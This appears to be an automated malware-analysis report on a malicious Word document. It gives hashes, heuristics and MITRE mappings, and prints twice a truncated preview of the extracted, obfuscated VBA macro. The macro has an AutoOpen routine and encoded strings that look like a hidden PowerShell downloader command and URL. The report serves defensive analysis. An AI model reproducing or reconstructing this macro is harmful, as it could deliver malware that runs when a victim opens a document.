Office (OLE) malware analysis — malicious · b08f951f027b0d8e

MALICIOUS

Office (OLE)

183.0 KB Created: 2018-05-15 20:59:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: aad638acbd208e53df07ac3d12445311 SHA-1: 426e3edd29d3acd95482fd268497c3146ea1daf7 SHA-256: b08f951f027b0d8e8be77f5ffb665c80624cbd5ee4d4e05b1c7ab3ac1790f843

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The critical heuristic firing indicates a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The AutoOpen macro marker suggests the malicious code is designed to run automatically when the document is opened. The obfuscated nature of the VBA code prevents a more detailed analysis of the exact payload, but the intent is clearly to execute an external command.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 144584 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	144584 bytes
SHA-256: `ce2273cf60db6f0f9bd37a1d843757bd78a52addcd74ba96926a1fea9dc853b9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YWtAOuMtrEo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub NmriZX(QDLDd) Httbt = HROaGn ljvcki = OZhHlm + CDbl(33973 - pYbdN - jmWRh + CDbl(22672)) - 39266 - CDbl(63391) Llrslj = baYin MmpGhh = 53594 End Sub Sub zcaSCw(KDTah) VVutjp = zBEia akcai = FJMIQa + CDbl(68271 - vRXFHG - qQvNB + CDbl(84194)) - 14137 - CDbl(85965) YwsAWo = concRI dTwDY = 61493 wWTujU = NcvzQO UhjPHj = QTiqiD + CDbl(34898 - EoiMTa - YFnTB + CDbl(28139)) - 23572 - CDbl(86420) AtdIlN = QwjhCp BROTX = 12447 DvJuI = cohjEb poaJH = BSPjtX + CDbl(68845 - mCnuo - PwwTNc + CDbl(69471)) - 21091 - CDbl(54383) DcboO = rFLjF oMPXZb = 81446 End Sub Sub ulQokt(GviHqp) jQvun = KhiIh ImDqD = UqURM + CDbl(74729 - UXlJj - PGnfz + CDbl(53316)) - 58030 - CDbl(76444) bMCIH = kDCEb VzjOEI = 81982 BZYBj = LVGEO UDOIP = fmkTi + CDbl(9155 - atGHR - SnUPBo + CDbl(1320)) - 47947 - CDbl(79839) PzzqB = SlYzzd iiqTw = 16926 End Sub Sub Autoopen() On Error Resume Next ENpJv = AnMTOf jUVlOE = bVjSvp + CDbl(67859 - jLUEQR - BIouP + CDbl(57055)) - 58642 - CDbl(46491) kUnXO = FFrMw iXNGCN = 13573 SwuwIpVfBi (wJPYf + AOITdAhKqzDTS + NwUpS) zihbBL = TFPND RWlbn = PXWFa + CDbl(9139 - svzIk - tAlzp + CDbl(72994)) - 10240 - CDbl(83562) nwjwLE = vcVjd ZbZGW = 73931 End Sub Sub bUwiL(UjXvp) UZkaWi = KizXnE paKaj = SYOTz + CDbl(8233 - AkjYjj - IdpBDc + CDbl(56665)) - 53458 - CDbl(76974) wJamUt = zMZPw RaRss = 50936 bqHGQM = IWGlrk Wqdzfq = bUGiL + CDbl(36186 - aljkB - AGCUVI + CDbl(15728)) - 26211 - CDbl(50914) oYLYu = otMjnA AXEtN = 66935 WApulP = JdXiwA SKAud = zqXRBA + CDbl(71120 - zRPui - jniRnf + CDbl(93521)) - 58912 - CDbl(31153) BrzGiM = zjtoj YslimM = 23042 End Sub Sub nRLfi(iGzsSa) PKAiSk = QLlAC KYBBJ = EiOZn + CDbl(51381 - kVsmA - FuIhk + CDbl(310)) - 39833 - CDbl(53519) rcjKcU = JFwjA ABlND = 26855 End Sub Attribute VB_Name = "rXYkfzP" Sub rRAoq(qltdz) SMnpRV = uGwXwG ITDvff = QSnvu + CDbl(19093 - JQsjF - hikjTK + CDbl(25521)) - 41250 - CDbl(91145) uEiOwX = zzRfCt tXLSkq = 8720 End Sub Function AOITdAhKqzDTS() On Error Resume Next qcudiU = USiUYt LvTmiu = ozfllp + CDbl(92514 - ukFpGN - UToNV + CDbl(55563)) - 98392 - CDbl(94322) UFCLQw = HKBCfO zifWYw = 29648 VdRNa = nNfObV pwcPb = tCGKET + CDbl(37201 - fCNFG - zPAtGA + CDbl(69565)) - 84176 - CDbl(44137) aiJVbK = dpzMB SMtHY = 15894 PGjVk = iKpOZ("Fcs'+RhEpSRhE'+'+RhE.'+'RhE+RhE4RhE+RhEHnnRhE+RhErRhE+RhEayRhE+RhE.2RhE+RhEoRhE+RhEhu=lRhE+RhE?pRhE+RhEhp.RhE+RhEvtset/NUH/moRhE+RLFb", 90610 + 4 - 90610, 90610 + 127 - 90610) RIViM = wiIbL fQkaK = jVskQH + CDbl(59548 - AhjMsM - MXRJfI + CDbl(3288)) - 26846 - CDbl(52549) OoKWw = mjJrnS sNzPZP = 4740 XZOJQt = iABFF QFjLVd = WBEYJ + CDbl(46023 - bURBP - jktkU + CDbl(11837)) - 62079 - CDbl(62133) TwqzZ = lpRHuv WUqzs = 70316 fAQWNlV = iKpOZ("v51'X'+]3,1[)(GNIRTsoT.EcnerefERpesoBRev$ ( . \| )'\|','4zQ'(EcaLPER.)93]rAHc[]GniRTS[,'RhE'(EcHlSB5", 93217 + 6 - 93217, 93217 + 90 - 93217) OizpfC = LwqPzV hGhLw = piAuVi + CDbl(37691 - ZtVNv - vlwBRW + CDbl(94136)) - 51003 - CDbl(86834) szZBpO = otEFk FUBiQm = 5964 mCWpM = qkUXoN QJmjj = rcQdRP + CDbl(8255 - rUjiLV - BinQs + CDbl(99412)) - 46370 - CDbl(28995) QPNXD = pfAjN WZFZHE = 98596 sRIoBYcB = iKpOZ("B5dURhE+RhE+4HRhE+RhEnR'+'hE+RhEn4Hn(RhE'+'+RhE& =RhE+RhE dRhE+RhEsadRhE+RhEasnRhE+RhExRhE+RhEJQRhE('( icss", 41409 + 5 - 41409, 41409 + 99 - 41409) nocrN = fwToA NHMCC = mpfBif + CDbl(15595 - fEiqkv - zVcmV + CDbl(18305)) - 77026 - CDbl(42471) MMfuSO = CXaSJ mGwjjj = 52152 FJYSml = PAmLqa zUFbM = vFaSi + CDbl(83566 - XIRiS - jpSGjP + CDbl(56554)) - 61376 - CDbl(60953) HMWfBZ = BMDfhA GjvPWH = 67943 OAELzar = iKpOZ("zft)''nIOJ-5vwL", 31186 + 5 - 31186, 31186 + 8 - 31186) tztYj = ZLjhP TFLMU = OPRPLz + CDbl(78561 - AwUNJY - zTXmd + CDbl(86565)) - 60963 - CDbl(54645) UwRrO = YjvYs pdntj = 93313 Bakob = SWOkG jHVEu = ... (truncated)

SHA-256: ce2273cf60db6f0f9bd37a1d843757bd78a52addcd74ba96926a1fea9dc853b9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YWtAOuMtrEo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub NmriZX(QDLDd)
Httbt = HROaGn
ljvcki = OZhHlm + CDbl(33973 - pYbdN - jmWRh + CDbl(22672)) - 39266 - CDbl(63391)
Llrslj = baYin
MmpGhh = 53594
End Sub
Sub zcaSCw(KDTah)
VVutjp = zBEia
akcai = FJMIQa + CDbl(68271 - vRXFHG - qQvNB + CDbl(84194)) - 14137 - CDbl(85965)
YwsAWo = concRI
dTwDY = 61493
wWTujU = NcvzQO
UhjPHj = QTiqiD + CDbl(34898 - EoiMTa - YFnTB + CDbl(28139)) - 23572 - CDbl(86420)
AtdIlN = QwjhCp
BROTX = 12447
DvJuI = cohjEb
poaJH = BSPjtX + CDbl(68845 - mCnuo - PwwTNc + CDbl(69471)) - 21091 - CDbl(54383)
DcboO = rFLjF
oMPXZb = 81446
End Sub
Sub ulQokt(GviHqp)
jQvun = KhiIh
ImDqD = UqURM + CDbl(74729 - UXlJj - PGnfz + CDbl(53316)) - 58030 - CDbl(76444)
bMCIH = kDCEb
VzjOEI = 81982
BZYBj = LVGEO
UDOIP = fmkTi + CDbl(9155 - atGHR - SnUPBo + CDbl(1320)) - 47947 - CDbl(79839)
PzzqB = SlYzzd
iiqTw = 16926
End Sub
Sub Autoopen()
On Error Resume Next
ENpJv = AnMTOf
jUVlOE = bVjSvp + CDbl(67859 - jLUEQR - BIouP + CDbl(57055)) - 58642 - CDbl(46491)
kUnXO = FFrMw
iXNGCN = 13573
SwuwIpVfBi (wJPYf + AOITdAhKqzDTS + NwUpS)
zihbBL = TFPND
RWlbn = PXWFa + CDbl(9139 - svzIk - tAlzp + CDbl(72994)) - 10240 - CDbl(83562)
nwjwLE = vcVjd
ZbZGW = 73931
End Sub
Sub bUwiL(UjXvp)
UZkaWi = KizXnE
paKaj = SYOTz + CDbl(8233 - AkjYjj - IdpBDc + CDbl(56665)) - 53458 - CDbl(76974)
wJamUt = zMZPw
RaRss = 50936
bqHGQM = IWGlrk
Wqdzfq = bUGiL + CDbl(36186 - aljkB - AGCUVI + CDbl(15728)) - 26211 - CDbl(50914)
oYLYu = otMjnA
AXEtN = 66935
WApulP = JdXiwA
SKAud = zqXRBA + CDbl(71120 - zRPui - jniRnf + CDbl(93521)) - 58912 - CDbl(31153)
BrzGiM = zjtoj
YslimM = 23042
End Sub
Sub nRLfi(iGzsSa)
PKAiSk = QLlAC
KYBBJ = EiOZn + CDbl(51381 - kVsmA - FuIhk + CDbl(310)) - 39833 - CDbl(53519)
rcjKcU = JFwjA
ABlND = 26855
End Sub

Attribute VB_Name = "rXYkfzP"
Sub rRAoq(qltdz)
SMnpRV = uGwXwG
ITDvff = QSnvu + CDbl(19093 - JQsjF - hikjTK + CDbl(25521)) - 41250 - CDbl(91145)
uEiOwX = zzRfCt
tXLSkq = 8720
End Sub
Function AOITdAhKqzDTS()
On Error Resume Next
qcudiU = USiUYt
LvTmiu = ozfllp + CDbl(92514 - ukFpGN - UToNV + CDbl(55563)) - 98392 - CDbl(94322)
UFCLQw = HKBCfO
zifWYw = 29648
VdRNa = nNfObV
pwcPb = tCGKET + CDbl(37201 - fCNFG - zPAtGA + CDbl(69565)) - 84176 - CDbl(44137)
aiJVbK = dpzMB
SMtHY = 15894
PGjVk = iKpOZ("Fcs'+RhEpSRhE'+'+RhE.'+'RhE+RhE4RhE+RhEHnnRhE+RhErRhE+RhEayRhE+RhE.2RhE+RhEoRhE+RhEhu=lRhE+RhE?pRhE+RhEhp.RhE+RhEvtset/NUH/moRhE+RLFb", 90610 + 4 - 90610, 90610 + 127 - 90610)
RIViM = wiIbL
fQkaK = jVskQH + CDbl(59548 - AhjMsM - MXRJfI + CDbl(3288)) - 26846 - CDbl(52549)
OoKWw = mjJrnS
sNzPZP = 4740
XZOJQt = iABFF
QFjLVd = WBEYJ + CDbl(46023 - bURBP - jktkU + CDbl(11837)) - 62079 - CDbl(62133)
TwqzZ = lpRHuv
WUqzs = 70316
fAQWNlV = iKpOZ("v51'X'+]3,1[)(GNIRTsoT.EcnerefERpesoBRev$ ( . | )'|','4zQ'(EcaLPER.)93]rAHc[]GniRTS[,'RhE'(EcHlSB5", 93217 + 6 - 93217, 93217 + 90 - 93217)
OizpfC = LwqPzV
hGhLw = piAuVi + CDbl(37691 - ZtVNv - vlwBRW + CDbl(94136)) - 51003 - CDbl(86834)
szZBpO = otEFk
FUBiQm = 5964
mCWpM = qkUXoN
QJmjj = rcQdRP + CDbl(8255 - rUjiLV - BinQs + CDbl(99412)) - 46370 - CDbl(28995)
QPNXD = pfAjN
WZFZHE = 98596
sRIoBYcB = iKpOZ("B5dURhE+RhE+4HRhE+RhEnR'+'hE+RhEn4Hn(RhE'+'+RhE& =RhE+RhE dRhE+RhEsadRhE+RhEasnRhE+RhExRhE+RhEJQRhE('( icss", 41409 + 5 - 41409, 41409 + 99 - 41409)
nocrN = fwToA
NHMCC = mpfBif + CDbl(15595 - fEiqkv - zVcmV + CDbl(18305)) - 77026 - CDbl(42471)
MMfuSO = CXaSJ
mGwjjj = 52152
FJYSml = PAmLqa
zUFbM = vFaSi + CDbl(83566 - XIRiS - jpSGjP + CDbl(56554)) - 61376 - CDbl(60953)
HMWfBZ = BMDfhA
GjvPWH = 67943
OAELzar = iKpOZ("zft)''nIOJ-5vwL", 31186 + 5 - 31186, 31186 + 8 - 31186)
tztYj = ZLjhP
TFLMU = OPRPLz + CDbl(78561 - AwUNJY - zTXmd + CDbl(86565)) - 60963 - CDbl(54645)
UwRrO = YjvYs
pdntj = 93313
Bakob = SWOkG
jHVEu = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.